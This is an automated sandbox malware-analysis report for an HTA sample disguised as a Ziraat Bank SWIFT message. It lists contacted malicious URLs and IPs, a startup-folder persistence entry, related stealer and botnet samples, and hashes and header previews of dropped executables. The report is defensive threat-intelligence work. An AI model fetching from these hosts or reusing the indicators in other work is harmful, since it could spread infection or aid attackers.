http://ww12.przvgke.biz/jenyp?usid=26&utid=9204704395 | alg.exe, 00000003.00000003.2189424613.000000000068B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.autoitscript.com/autoit3/ | alg.exe, 00000003.00000003.2415308900.00000000004A0000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://54.244.188.177/7q | alg.exe, 00000003.00000003.1764366023.000000000064F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ww99.przvgke.biz/jenyp | alg.exe, 00000003.00000003.1933405508.000000000067B000.00000004.00000020.00020000.00000000.sdmp; alg.exe, 00000003.00000003.2410675571.0000000000695000.00000004.00000020.00020000.00000000.sdmp; alg.exe, 00000003.00000003.1966234277.0000000000690000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://54.244.188.177/kqP | alg.exe, 00000003.00000003.1764366023.000000000064F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://44.221.84.105/hwjtljgqnsqgbc | alg.exe, 00000003.00000003.1840248607.000000000064F000.00000004.00000020.00020000.00000000.sdmp | false
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://54.244.188.177/irtgqxbqsqyophmbx.exe, 00000001.00000002.1738685341.0000000000C42000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.bizalg.exe, 00000003.00000003.1924055176.0000000001530000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://82.112.184.197/alg.exe, 00000003.00000003.2410675571.00000000006A4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2423644007.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
Contacted IPs

IP | Domain | Country | ASN | ASN Name | ASN Country | Malicious
13.248.148.254 | 084725.parkingcrew.net | United States | 16509 | AMAZON-02 | US | false
104.21.67.152 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENET | US | false
44.221.84.105 | saytjshyf.biz | United States | 14618 | AMAZON-AES | US | false
54.244.188.177 | pywolwnvd.biz | United States | 16509 | AMAZON-02 | US | false
193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898 | US | false
72.52.179.174 | ww99.przvgke.biz | United States | 32244 | LIQUIDWEB | US | false
199.59.243.227 | 76899.bodis.com | United States | 395082 | BODIS-NJ | US | false
13.251.16.150 | ifsaia.biz | United States | 16509 | AMAZON-02 | US | false
47.129.31.212 | xlfhhhm.biz | Canada | 34533 | ESAMARA-AS | RU | false
172.234.222.138 | przvgke.biz | United States | 20940 | AKAMAI-ASN1 | EU | false
82.112.184.197 | vjaxhpbji.biz | Russian Federation | 43267 | FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMS | RU | false
18.141.10.107 | ssbzmoy.biz | United States | 16509 | AMAZON-02 | US | false
General Information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1566438
Start date and time: 2024-12-02 07:55:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 13m 11s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 27
Number of new started drivers analysed: 3
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Ziraat_Swift.hta
Detection: MAL
Classification: mal100.spre.troj.spyw.expl.evad.winHTA@28/149@27/12
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 72%
• Number of executed functions: 66
• Number of non-executed functions: 255
Cookbook Comments:
• Found application associated with file extension: .hta
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, DiagnosticsHub.StandardCollector.Service.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing behavior information
• Report size exceeded the maximum capacity and may be missing disassembly code
• Report size getting too big: too many NtAllocateVirtualMemory calls found
• Report size getting too big: too many NtOpenFile calls found
• Report size getting too big: too many NtOpenKeyEx calls found
• Report size getting too big: too many NtProtectVirtualMemory calls found
• Report size getting too big: too many NtQueryValueKey calls found
• Report size getting too big: too many NtSetInformationFile calls found
• Report size getting too big: too many NtWriteFile calls found
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:56:04 | API Interceptor | 1x Sleep call for process: mshta.exe modified
01:56:09 | API Interceptor | 15x Sleep call for process: alg.exe modified
06:56:10 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs
                                                                                                                                                • 18.141.10.107
                                                                                                                                                C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                76899.bodis.comhttp://readabilityscore.comGet hashmaliciousUnknownBrowse
                                                                                                                                                • 199.59.243.226
                                                                                                                                                http://bonalluterser.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                • 199.59.243.226
                                                                                                                                                file.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Stealc, XmrigBrowse
                                                                                                                                                • 199.59.243.225
                                                                                                                                                S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                • 199.59.243.225
                                                                                                                                                xPUqa4qbDL.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                • 199.59.242.153
                                                                                                                                                knjghuig.bizinvoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                CLOUDFLARENETUShttps://activationmail-setupmailvalidationonlineaaosaiaosuaos.es/all/?e=bWpiQGhvbWVwYWdlYXBpLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                                                • 104.17.25.14
                                                                                                                                                file.exeGet hashmaliciousAmadey, Nymaim, Stealc, VidarBrowse
                                                                                                                                                • 172.67.165.166
                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 104.21.16.9
                                                                                                                                                UolJwovI8c.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.21.74.149
                                                                                                                                                PI-02911202409#.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                                                • 188.114.97.6
                                                                                                                                                PO#BBGR2411PO69.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                                                • 188.114.97.6
                                                                                                                                                http://demo.specialistbanking.co.uk/ad.PDFGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.16.123.96
                                                                                                                                                ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                • 172.67.145.234
                                                                                                                                                file.exeGet hashmaliciousAmadey, Discord Token Stealer, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                                                                • 172.67.165.166
                                                                                                                                                sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 1.4.51.14
                                                                                                                                                AMAZON-AESUShttp://demo.specialistbanking.co.uk/ad.PDFGet hashmaliciousUnknownBrowse
                                                                                                                                                • 52.203.8.108
                                                                                                                                                file.exeGet hashmaliciousAmadey, Discord Token Stealer, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                                                                • 18.213.123.165
                                                                                                                                                sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 18.210.239.2
                                                                                                                                                Original CI PL.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                • 107.23.200.217
                                                                                                                                                teste.x86.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                                                                                • 44.198.41.66
                                                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 3.223.200.11
                                                                                                                                                sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 54.62.131.206
                                                                                                                                                sora.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 54.42.39.86
                                                                                                                                                sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 18.207.157.33
                                                                                                                                                sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 54.135.193.72
                                                                                                                                                AMAZON-02UShttp://demo.specialistbanking.co.uk/ad.PDFGet hashmaliciousUnknownBrowse
                                                                                                                                                • 63.33.81.165
                                                                                                                                                ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 54.171.230.55
                                                                                                                                                arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 54.171.230.55
                                                                                                                                                teste.x86.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                                                                                • 54.214.255.210
                                                                                                                                                teste.arm7.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                                                                                • 54.78.26.72
                                                                                                                                                teste.arm.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                                                                                                                • 18.221.123.44
                                                                                                                                                sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 35.75.100.92
                                                                                                                                                sora.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 18.137.217.254
                                                                                                                                                sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 108.148.111.224
                                                                                                                                                sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 54.110.214.166
                                                                                                                                                AMAZON-02UShttp://demo.specialistbanking.co.uk/ad.PDFGet hashmaliciousUnknownBrowse
                                                                                                                                                • 63.33.81.165
                                                                                                                                                ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 54.171.230.55
                                                                                                                                                arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 54.171.230.55
                                                                                                                                                teste.x86.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                                                                                • 54.214.255.210
                                                                                                                                                teste.arm7.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                                                                                • 54.78.26.72
                                                                                                                                                teste.arm.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                                                                                                                • 18.221.123.44
                                                                                                                                                sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 35.75.100.92
                                                                                                                                                sora.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 18.137.217.254
                                                                                                                                                sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 108.148.111.224
                                                                                                                                                sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 54.110.214.166
                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                54328bd36c14bd82ddaa0c04b25ed9adMICROCHIP QFP3 22 - 25000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                • 104.21.67.152
                                                                                                                                                JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                • 104.21.67.152
                                                                                                                                                RRT78-89079090GFVU0-INVRYU-FVIOJ0I.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 104.21.67.152
                                                                                                                                                RFQ_PO N89397-GM7287-Order.bat.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 104.21.67.152
                                                                                                                                                ZM-Z_2024-000343__SKM-0_000.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                • 104.21.67.152
                                                                                                                                                INQUIRY_pdf.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                • 104.21.67.152
                                                                                                                                                FATURA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                • 104.21.67.152
                                                                                                                                                RECEIPT DATED 28.11.2024,pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                • 104.21.67.152
                                                                                                                                                drawing 10023. spec T4 300W .... dimn 560horsepower po 1198624 _ %00% spec .exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                • 104.21.67.152
                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 104.21.67.152
                                                                                                                                                No context
Process: C:\Windows\System32\alg.exe
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1353216
Entropy (8bit): 5.324392127149725
Encrypted: false
SSDEEP: 12288:TC4VQjGARQNhiFXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:TOCAR0iFsqjnhMgeiCl7G0nehbGZpbD
MD5: C87616AD4EE0DCF4B5C5C5455523DC02
SHA1: 0F070A61A197DC4740B375B62985AD63CF85855E
SHA-256: CD73E935AC7397551890CE8F35D8DD1DC1C0372E6F44132D2C91FE7BFF92669C
SHA-512: 96B917C1A67C30D96C9E9000D5FC8E814C6CA13592A66A1D4562E6C3973440E4D166CCC1A1DD8F1AB3E3E038D04EC390F1D4B293AF31FEAD78826E5A2C40CCA3
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1294848
                                                                                                                                                Entropy (8bit):5.2827029540953
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:oNUpaKghCXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:oCMKgQsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:6C9C41C433FDEDFF6B3B15C2F8591F0A
                                                                                                                                                SHA1:2A736A37AA1FD3FF387608EDC3AC073AEC05B746
                                                                                                                                                SHA-256:29C1C32E31D12D293D500984920F71E4E7C0DBFCF8802F79180F08964B64EC4E
                                                                                                                                                SHA-512:C79BD1196E77C4006DFCEE5FF470CBD42D00D34FAB364EE636CC3CA8EF20C0F96DE4B10718CED3F770F8D3CEBA983E614852844E9B7B39B0E42490931916B666
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1314304
                                                                                                                                                Entropy (8bit):5.274142278022451
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:xMEhwdbT5Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:PKdH5sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:72EA5E11FC4A1E6E7E362080A0F553D5
                                                                                                                                                SHA1:EA9965AE112DD884C16242CF624CCA998E0F1AF5
                                                                                                                                                SHA-256:7390C6729A4DBB06473EDE82C8E965494479738E877172B4351F907BE7C1D3AD
                                                                                                                                                SHA-512:DB0708B4CF5A22B5BFB3E66566D16A13D9AAC111524F219F9C3AB8F6D8D86D6AC1E63DA3B684F5B4871B600C8A07ECE6F741DCA68DFC3F0D1172BE5A73DB569F
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2203136
                                                                                                                                                Entropy (8bit):7.64703726104498
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:5K0eqkSR7Xgo4TiRPnLWvJlDmg27RnWGj:5K0pR7Xn4TiRCvJlD527BWG
                                                                                                                                                MD5:A063278F25C70AF7368384BBA8CCC0F6
                                                                                                                                                SHA1:874FA72AF12E4AE6E6591F161B59D8C6F18C0CAE
                                                                                                                                                SHA-256:B516DA72A138BDACFA25A998F6929218BA3BDD60AE292E7920A7DFC62EA98E35
                                                                                                                                                SHA-512:CD9A66AD4AF4D99E8CE6A421E761DA38DA7B9A852E50D9A5C0040590E6CA73755F705F092F3697B4C6EF4CC388A3D78F375215ADB9EF3501F0CCB3D250263B77
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2369024
                                                                                                                                                Entropy (8bit):7.565063173898028
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:ifYP1JsEDkSR7Xgo4TiRPnLWvJlDmg27RnWGj:yYPBR7Xn4TiRCvJlD527BWG
                                                                                                                                                MD5:0216EE9C539B2DE59B45142A9A6A3726
                                                                                                                                                SHA1:FE9A2BDB273BE6BF6AE320F5F24CCDEE4E6E7501
                                                                                                                                                SHA-256:FC08F9B782F0C0C4E66C61F350B5E016FE88DD4E0709F3BDB663E094695F569B
                                                                                                                                                SHA-512:6835D1D49202911833D077DEDEFBDA68C208267945BA258A0C822A3FC47A34D861A65860ECEC98E94598240B4FD8BF6512441A836F1690303B28FED32BF6C988
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1245184
                                                                                                                                                Entropy (8bit):5.12356816645073
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:k62SYUcknnTXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:xYUcknTsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:7825CB0B983B1915C7060185F6EB1B2B
                                                                                                                                                SHA1:A9ACA76309E082CC043EB421FF0AAA3BCB37C73D
                                                                                                                                                SHA-256:33D125EFE995F2D866097F1B308CE5E52DE4BD45B9AC79C1E98B7798140181C5
                                                                                                                                                SHA-512:5A55FAE894415A08F0CD65950C35F770DF1AC5E167F11794F99D920C4D4D43E74EC14EC1A0C787CA7267F4F066461A3BB8AE8B289405FD8079A5362D61DB9B34
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1640448
                                                                                                                                                Entropy (8bit):7.1666698360156555
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:z+iAqSPyC+NltpScpzbtvpJoMQSq/jrQaSBDmg27RnWGj:RSktbpXD527BWG
                                                                                                                                                MD5:8F557566CA84E322018A2B23B5A8A84B
                                                                                                                                                SHA1:8C723FAC77FCB19DF60053912B8075076683FEF5
                                                                                                                                                SHA-256:A1CFD240B671B463427CBB3480BCC9F00D1E959FFC80A2132B2C61083BFD2ECC
                                                                                                                                                SHA-512:48F2E315B90BF3889AD1C468574D07C65870C8752DEA8A58BDDF1F9EBFC76EAC528BDCBC8108F41459AC946485701FA748EA97E125F73A96F114BC6319879AA2
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2953728
                                                                                                                                                Entropy (8bit):7.09463346611018
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:2GSXoV72tpV9XE8Wwi1aCvYMdVluS/fYw44RxLODmg27RnWGj:y4OEtwiICvYMRfuD527BWG
                                                                                                                                                MD5:577FD8FA4E44AD642FCEB518746127EC
                                                                                                                                                SHA1:8CFC79898B6CE9069F3F32DBDCFAC249FC1E1D98
                                                                                                                                                SHA-256:2988A2095B75C9296B0B55D04498E7338608D59F37DCCCCFD935692AC9945786
                                                                                                                                                SHA-512:FACB79FC9C2B3CA3B732664DEA6E252B545A2289A59D0782B9E1365FF2DF91FD522D241A995B1197F8AE85401972BDA4D89514F4546811012AD0FA116654E3FA
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1485824
                                                                                                                                                Entropy (8bit):5.49640336777187
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:pAMuR+3kMbVjhVsqjnhMgeiCl7G0nehbGZpbD:+D+lbVjhJDmg27RnWGj
                                                                                                                                                MD5:A5B1D024A96B1CD8C2A6DA504B3C7D81
                                                                                                                                                SHA1:74DA7220B97871ED9AB9464B549BFD2F1963E12F
                                                                                                                                                SHA-256:60146A7633DB8C98353B30DC1FCB7FD93FAD47CB5FD1DC511AC84465D93D2EB4
                                                                                                                                                SHA-512:3C0DAC9326536D2773934D3735CE7A2D8B78FFBDA56F632D4E93AAF2FF5CA84E56AF8FE1FD72BB2981EAC9F93913ADF76C145418D2FCFDBD60AE1EDBC8F4169C
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1290240
                                                                                                                                                Entropy (8bit):5.277762657821456
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:QImGUcsvZZdubv7hfl3fXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:QxGBcmlvsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:C8BF45BDD9AC7A2C04E7836B9AC9D15E
                                                                                                                                                SHA1:513F87DFBFB9699D044E9101846F4DD278FC9E47
                                                                                                                                                SHA-256:C2F06250B7606D599377A25CBBB4A689A10BB51A755397FB5EF58077FEAD8ED3
                                                                                                                                                SHA-512:0A3F6E39B8031B961783B059C88BE677EBFB7A6C7A4BE125047A81A855506E6FC7F255ABD898A74E5EE395A00D1E1E07BF162B342852BE3928A1DA3A5E88CF4C
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@................................./.......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1644544
                                                                                                                                                Entropy (8bit):5.6948062798472945
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:t0vHyeLj8trn3wsDsqjnhMgeiCl7G0nehbGZpbD:wtj4rgsHDmg27RnWGj
                                                                                                                                                MD5:CAC57CEE72A26F39FBF9019DFD994258
                                                                                                                                                SHA1:1FA8CFF5B16B4AFD4D53CE77E47BD215E69CCDDE
                                                                                                                                                SHA-256:8EB7C8FC4F36F6494BE37DAC180D7AB0AE5DC492AE6A6BB1EC1ED5048E0FBCBD
                                                                                                                                                SHA-512:85F5054D3C894DA1E2F76CFDAC743706F0A8C9B4C33AB7561B00C5BFD05530DF3C6534A5A4DF05D5B68315097B4BCB81CC4C68D8E0E698482C1F33DC9F3FFBA1
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g=H(#\&{#\&{#\&{77%z2\&{77#z.\&{A$.{"\&{A$"z1\&{A$%z5\&{A$#zu\&{77"z;\&{77 z"\&{77'z4\&{#\'{.\&{.%"z$\&{.%#z.\&{.%.{"\&{#\.{!\&{.%$z"\&{Rich#\&{........PE..L.....d............................7........0....@..........................`..............................................<........P...|..........................0m..............................pl..@............0..t............................text...?........................... ..`.rdata.......0......................@..@.data....3....... ..................@....rsrc....|...P...~..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1781760
                                                                                                                                                Entropy (8bit):7.279671701052209
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:1oMOW0n7Ubxk/uRv5qLGJLQ4a56duA/85RkV4l7/ZqsqjnhMgeiCl7G0nehbGZpv:s4i0wGJra0uAUfkVy7/Z+Dmg27RnWGj
                                                                                                                                                MD5:E0BA361D8DB272A47BCF8AC05D8D8DDE
                                                                                                                                                SHA1:2308743BCA80A903EE6B7AFC9194010116B8F6EF
                                                                                                                                                SHA-256:4E427BAC41FD02E06DA61150B76F1EB6B67E29F47DB85D67A153614C952CCBF2
